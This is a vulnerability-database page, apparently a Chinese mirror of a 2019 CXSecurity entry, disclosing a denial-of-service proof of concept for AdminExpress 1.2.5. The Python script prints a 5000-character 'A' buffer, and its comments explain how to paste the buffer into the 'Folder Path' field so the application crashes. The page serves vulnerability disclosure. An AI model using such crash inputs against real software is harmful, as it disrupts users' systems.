AdminExpress 1.2.5 Folder Path Denial of Service (PoC) - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1580281 漏洞类型
发布时间 2019-04-23 更新时间 2019-04-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040213
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# -*- coding: utf-8 -*-
#!/usr/bin/python

# Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
# Date: 2019-04-12
# Exploit Author: Mücahit İsmail Aktaş
# Software Link: https://admin-express.en.softonic.com/
# Version: 1.2.5.485
# Tested on: Windows XP Professional SP2

# Description:
#
# 1) Click the "System Compare" button
# 2) Paste the payload in the "Folder Path" (left)
# 3) Click the scales icon (in the middle, right side of "Folder Path")
#


buffer = "A" * 5000

print("Payload: \n\n" + buffer + "\n")